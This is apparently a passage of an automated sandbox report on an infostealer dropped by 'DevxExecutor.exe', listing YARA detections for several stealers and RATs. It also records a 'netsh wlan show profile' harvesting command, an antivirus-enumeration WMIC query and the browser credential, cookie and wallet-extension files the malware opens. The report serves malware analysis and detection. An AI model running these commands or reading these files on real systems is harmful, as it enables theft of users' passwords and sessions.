                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\_ssl.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\_hashlib.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\_queue.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md.cp311-win_amd64.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md__mypyc.cp311-win_amd64.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC677960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00000271DC677960
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF695806DCC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,3_2_00007FF695806DCC
                                Source: C:\Users\user\Desktop\DevxExecutor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                Lowering of HIPS / PFW / Operating System Security Settings

                                barindex
                                Uses netsh to modify the Windows network and firewall settings
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

                                Stealing of Sensitive Information

                                barindex
                                Yara detected Blank Grabber
                                Source: Yara matchFile source: 00000012.00000003.2244326949.00000177139C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000003.2244326949.00000177139C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.2290157848.0000020710C61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI14722\rarreg.key, type: DROPPED
                                Yara detected CStealer
                                Source: Yara matchFile source: 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.2292462578.0000025416446000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000005C.00000003.2565952065.00000239F3175000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2632028088.00000271D9EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2274816378.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.2289697858.0000025416446000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2294300603.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2315471256.0000020102B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.2285580339.0000025416469000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2207767340.0000020102CDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2219861394.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: cstealer.exe PID: 6608, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cstealer.exe PID: 3292, type: MEMORYSTR
                                Yara detected Discord Token Stealer
                                Source: Yara matchFile source: 46.0.main.exe.16132da05b8.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c3ef04.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                Yara detected Millenuim RAT
                                Source: Yara matchFile source: 46.0.main.exe.16132da05b8.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c3ef04.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                Yara detected Telegram RAT
                                Source: Yara matchFile source: 46.0.main.exe.16132da05b8.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c3ef04.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                Tries to harvest and steal WLAN passwords
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Tries to harvest and steal browser information (history, passwords, etc)
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
